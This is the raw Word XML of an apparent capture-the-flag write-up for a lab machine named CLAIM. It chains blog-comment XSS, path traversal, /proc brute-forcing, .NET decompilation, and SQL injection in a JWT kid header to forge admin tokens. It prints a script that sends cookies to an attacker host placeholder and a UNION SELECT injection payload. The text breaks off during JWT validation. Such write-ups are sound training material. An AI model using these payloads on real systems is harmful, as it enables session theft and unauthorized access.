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6gjyyfwyiu02"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tqlvonadmwsb" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the CLAIM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6">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6pmurv1a94z7" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>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Therefore,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71600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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3716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the presence of port 80 hosting a web service and port 22 corresponding to SSH. When accessing port 80 of the web service, a redirection occurs to the domain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">claim.hc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95600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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resolve this, it is necessary to map the IP address to the domain name by adding an entry to the hosts file, as demonstrated in the image below.</w:t>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49"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application again following the described steps, we verified that it is a blog containing three posts related to cybersecurity. When clicking on one of these posts, it was possible to identify the functionality to leave comments, as well as observe several comments made by other users.</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During the analysis, we found that the comment input field does not implement any sanitization mechanism, which allows exploitation of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Cross-Site Scripting (XSS)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability.</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leveraging this flaw, it is possible to inject a malicious payload to capture the cookies of other users, including the administrator, who may be accessing the posts. Below is an example payload used for this exploitation:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">
      <w:pPr>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image = new Image();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000012">
      <w:pPr>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image.src='http://&lt;vpn-ip&gt;:8888/?'+document.cookie;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">
      <w:pPr>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&lt;/script&gt;</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90600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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63600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="8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capturing the administrator’s cookie, we faced the issue of not knowing which specific route we should access to exploit administrative privileges or other sensitive functionalities. In this case, an effective approach is to perform fuzzing to identify hidden routes or relevant endpoints within the application.</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5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fuzzing process, we identified two important routes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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 which appears to be the application’s administrative panel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>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/files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 directory that may contain sensitive or relevant files.</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These findings are crucial for the next stages of exploitation and analysis.</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access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 route, we replaced our cookie with the value obtained earlier, corresponding to the administrator user. With this modification, we successfully accessed the administration route, obtaining elevated privileges within the application.</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63"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access to the administrative page, it is possible to download the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">statistics.xlsx</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly through the interface. Additionally, we identified that the route responsible for downloading this file is vulnerable to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allowing arbitrary file reading on the system.</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73"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6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reading multiple system files without finding relevant information, we adopted an alternative approach: performing a brute-force attack on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PID </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/&lt;pid&gt;/cmdline</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This technique allows identification of processes running internally on the system. By analyzing this data, it is possible to obtain information about running applications or sensitive processes that can be leveraged to advance exploitation.</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57300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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brute-forcing </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/proc/&lt;pid&gt;/cmdline</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identified that a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.NET application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is being executed by the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">eliot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The next step is to download the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webapi.dll</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order to conduct a code review.</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is a .NET application, we use the tool </w:t>
      </w:r>
      <w:hyperlink r:id="rId18">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">dnSpy</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which allows decompilation and analysis of the application logic to identify potential vulnerabilities.</w:t>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05100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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4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17272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219200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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opening the file </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webapi.dll</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> in dnSpy and navigating to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webapi.Entities -&gt; JwtKeys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we identified a class containing sensitive information related to JWT keys.</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77"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Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JwtKeys</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> class has three main properties:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A numeric identifier.</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uuid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A string likely serving as a unique key identifier.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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jwtKey</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: A string storing the key used to generate or validate JWT tokens.</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analyzing the code of the class </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jwtKeyService</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we identified a critical </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Injection</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability that can be exploited to gain control over JWT token validation.</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4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vulnerable code, the value of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, extracted from the JWT header, is directly concatenated into the SQL query without any sanitization or validation.</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API requires a valid JWT to access administrative routes and there is no possibility to register new users, we can exploit this SQL Injection vulnerability by inserting a malicious payload into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uuid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 of the query.</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objective at this stage is to manipulate the SQL query to control the value of the JWT signing key. The following payload was used in the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kid</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000034">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"AAAAAA' UNION SELECT 1, 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000035">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'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' LIMIT 0,1 -- -"</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gah1wcb7ngk8" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Attack Strategy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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uaqy5geqtfws" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1. SQL Query Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The payload injects a SQL command that forces the query to return controlled values directly into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jwtKey</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this case, the value </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is injected into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jwtKey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column.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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ujnnwbwr8ie" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>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jhwrk96og6dp" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. JWT Token Signing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="0" w:afterAutospacing="0" w:before="240" w:lineRule="auto"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After sending the payload, the application code will use the injected value as the key to validate the JWT token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="0" w:beforeAutospacing="0" w:lineRule="auto"/>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sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since this value is now known, we can generate and sign a valid JWT using the website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://jwt.io/</w:t>
        </w:r>
      </w:hyperlink>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After generating the JWT token using the key injected via SQL Injection, the next step is to validate the token using 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/api/posts</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route, which is an authenticated route.</w:t>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62"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Before validating the JWT on the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/posts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
